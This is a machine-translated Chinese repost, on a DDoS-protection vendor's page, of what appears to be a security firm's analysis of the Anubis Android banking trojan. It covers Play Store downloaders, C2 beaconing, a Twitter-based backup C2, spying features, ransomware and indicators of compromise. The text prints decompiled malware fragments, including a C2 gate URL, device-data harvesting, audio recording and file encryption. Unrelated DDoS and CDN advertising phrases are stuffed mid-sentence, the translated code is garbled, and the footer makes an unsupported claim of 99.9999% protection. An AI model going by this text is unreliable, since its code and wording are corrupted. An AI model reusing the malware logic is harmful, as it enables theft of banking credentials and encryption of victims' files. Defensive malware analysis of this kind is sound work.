DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > 高防服务器 > 正文

ddos防火墙_cdn防护原理_解决方案

ddos防火墙_cdn防护原理_解决方案

作者:Jagadeesh ChandraiahAndroid研究人员称之为(主要)针对土耳其用户的盗用凭证恶意软件,一个名为Anubis的恶意软件家族在过去几个月成功渗透到谷歌Play商店。应用程序创建者通常会将木马伪装成金融、汽车或购物应用程序,但实际上,它的功能是下载程序。一旦激活,Anubis应用程序将获取主要的恶意负载,高防cdn无视任何ddos,该负载旨在窃取银行凭证,并向僵尸网络所有者提供受危害设备的远程控制功能。阿努比斯首次被发现后,谷歌彻底清理了游戏商店。但我们并没有得到太多的休息;最近在Play商店发现了新的Anubis下载程序。这个银行恶意软件家族的持久性值得我们仔细研究一下它的功能。那么阿努比斯到底是什么?不,这篇文章不是关于古埃及的防腐神和死者。Anubis是一种银行特洛伊木马和机器人,源于我们今年早些时候写的Maza in banking特洛伊木马源代码泄漏。所有出现在googleplaystore上的应用程序都是无害的应用程序,因为它们没有嵌入任何负载。这些应用程序是下载程序:它们在成功安装并与命令和控制服务器交互后获取有效负载。由于Play商店上有数以百万计的应用程序从互联网上下载某种内容,谷歌Play的安全服务很难扫描并完全了解正在下载的内容。因此,恶意下载者在到达商店时可能看起来是干净的。一旦成功安装和激活,这些应用程序会等待一段时间,只有在长时间等待之后,才会下载并激活其恶意内容。这种简单但极其恶毒的伎俩允许恶意软件作者愚弄游戏商店的防御机制。我们以前见过恶意软件作者使用这种延迟策略,基于我们所看到的成功,将来很可能会继续这样做,至少在谷歌推出某种对策之前。下载程序下载程序的代码是恶意应用程序的第一层。它没有使用混淆,而且乍一看,看起来很干净,这样就可以绕过googleplay的防御,允许发布。一旦安装,下载程序将收集设备数据,向指挥控制服务器发送信号,并下载更多的应用程序。在下面的代码中,cc防御软件linux,您可以看到对CnC服务器的引用和恶意软件的配置数据。public static final boolean REPEAT_ADMIN_REQUEST_AFTER_DISABLE=true;公共静态列表服务器=null;public static int SERVER_TRY_COUNT=0;公共静态最终长启动安装间隔=20000;公共静态最终长任务检查间隔=60000;静态{配置日志目录= "";Config.DOWNLOADS\目录=新文件(环境.getExternalStorageDirectory(), Rows.下载);配置服务器= 数组.asList(新字符串[]{"http://bluetek1com/gate.php"});Config.SERVER\u TRY\u计数=5;}恶意软件收集的数据包括IMEI、OS版本、型号名称、根状态等参数:((地图)v3).put(行.api_req,"1");((地图)v3).put(Rows.api_imei行, getimeils公司(arg6));((地图)v3).put(行.api_uniqnum,arg7.getId());((地图)v3).put(Rows.api_型号, 构建.模型);字符串v4=Rows.api_根;字符串v1=实用工具不可用() ? "1":"2";((地图)v3.put(v4,v1);((地图)v3).put(Rows.api_国家/地区,((电话管理器)v0_1).getNetworkCountryIso());((地图)v3).put(行.api\u osver,生成$版本.发布);v2.邮递(Utils.getPostBody(((地图)v3));通过模糊处理隐藏关键字符串。下面是一个混淆字符串的示例:"D**pE2****pE2****pE2**i**pE2****pE2****pE2**s**pE2****pE2**a[已删除]"同一个字符串的模糊处理形式:"禁用此选项可能会破坏您的系统。你确定吗?"有效载荷如前所述,丢弃的负载是Anubis banking特洛伊木马本身。一旦执行,恶意负载会弹出一个可访问性权限请求访问,假装是一个Google保护请求。可访问性权限为恶意软件提供了额外的功能,个人如何防御ddos攻击,可以模拟屏幕上显示的按钮的单击,获取特定事件的回调,并构造设备的上下文来窃取用户数据。与下载程序不同,特洛伊木马的源代码被混淆,难以分析。执行时,它隐藏其快捷方式图标。然后,有效负载在运行时丢弃并加载另一个JAR文件。接下来,它在后台等待进一步的操作。额外功能除了银行恶意软件,Anubis还具有其他功能。很糟糕:短信垃圾发送RAT(远程管理工具)功能:录音捕获屏幕内容位置跟踪键盘记录勒索软件下面是录音机函数的一段代码:MediaRecorder v6=新的MediaRecorder();this.c.a("声音","开始录制声音");this.b=错误;v6.设置音频源(1);v6.setOutputFormat(3);v6.设置音频编码器(1);v6.setOutputFile(arg11);线程v7=新线程(新可运行(arg12、v6、arg11、arg10){公共无效运行(){StringBuilder v3;串v2;第1节;试试看{线程睡眠((长)(本a*1000));}接球(抛掷v1){this.e.c.a("声音","停止录制声音");内置勒索软件组件对用户文件进行加密,并提供.Anubiscrypt文件扩展名。请记住,这是在手机上运行的,它比笔记本电脑或台式机更不可能被备份,更有可能拥有个人照片或其他有价值的数据:否则如果(!v2.getPath().contains(".AnubisCrypt")){v3=this.a.a(v3,this.c);StringBuilder v6=新建StringBuilder();附加(v2.getPath());v6.append(".AnubisCrypt");v4=新的FileOutputStream(v6.toString(),true);写(v3);if(this.b.equals("crypt")){v7_1=这个.a;v1_1=新建StringBuilder();v1_1.附加("p=");v2_1=这个.a;v3=新建StringBuilder();追加(this.a.q(((Context)this));v3.append("|加密器激活,文件系统用密钥加密:");附加(this.c);v3.append("|");v1_1.append(v2_1.c(v3.toString());v7_1.b(((Context)this),"4",v1_1.toString());v7_1=这个.a;v0_1="加密文件";v1_2="真";Anubis恶意软件的简要工作流程如下所示:指挥控制通信当下载程序向C2服务器发送信标时,数据包含手机的根状态、IMEI、设备型号和其他参数。注:在撰写本报告时,C2保持沉默。{"root":"1","country":"gb",如何开启高防cdn,"os-ver":"5.0","uniqnum":"15b76e7d-e1a1-4f3a-8603-5f4b8041bd64","imei":"123442323","req":"1","model":"Nexus 5"}:使用Twitter获取备份C2非常有趣的是,这个特洛伊木马支持了依赖Twitter获取备份C2的趋势。在红色警报银行特洛伊木马程序中也看到了类似的行为。下面的示例演示了一个twitter句柄如何包含base64编码的数据,并用zero标记括起来: 解码数据是备份C2服务器的URL:com公司C2为恶意软件提供了一个用于网上银行的虚假登录屏幕,cdn和cc哪种更应该防御,如下图所示:  C2面板和目录结构Anubis恶意软件与多个不同的C2服务器通信。其中一些公开了opendirectory结构。通过浏览服务器的开放目录,我们发现了700多个恶意Android应用程序,这些应用程序准备返回给受害者:C2面板的管理面板公开了有关此恶意软件受害者的详细信息。仅在一台这样的服务器上,2600多个活动受害者的信息被聚合在一起,每个受害者都向服务器报告。服务器上收集的数据与恶意软件从受害者处收集的数据相同–它包括根状态、IMEI、国家和连接状态:目标银行应用程序Anubis特洛伊木马针对70多个不同的银行应用程序,这些应用程序是为桑坦德银行、纳特韦斯特银行、苏格兰皇家银行和花旗银行等银行构建的。除此之外,这些恶意软件还针对一些非银行应用程序,如贝宝、易趣和亚马逊。结论鉴于阿努比斯表现出的坚持,阿努比斯是一个持续的运动,不会很快消失。几个阿努比斯应用程序已经从Play store中移除,展示了一把双刃剑。一方面,googleplay正在奋战,从Play商店定位并删除恶意应用程序。另一方面,这些应用程序不断回来,每次都会用各种各样的伎俩来欺骗googleplay的防御,一次又一次地发布。当恶意负载在某个延迟后被下载时,一个简单的技巧具有惊人的弹性。为了减少被感染的机会,用户应该只安装有信誉的开发者的应用程序。从我们这边来说,我们一直在跟踪这一特定的活动,以及其他许多活动,让Sophos移动安全的用户没有被感染的机会。Sophos检测到Anubis下载程序为Andr/Banker GWQ,有效负载本身为Andr/Banker GUZ和Andr/Banker GTN。IOC:C2域bluetek1comjunilogart8信息redtek0comIOC:恶意软件哈希074AE028BD3204A7E7A510AD0F88C49CB780FA07E91944F111AF146C39C91C5a6f9ac189dc65dad3744005644a251f73ff2a8022a70431bf90945fc7da021b

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /ddos/51520.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 6943075访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X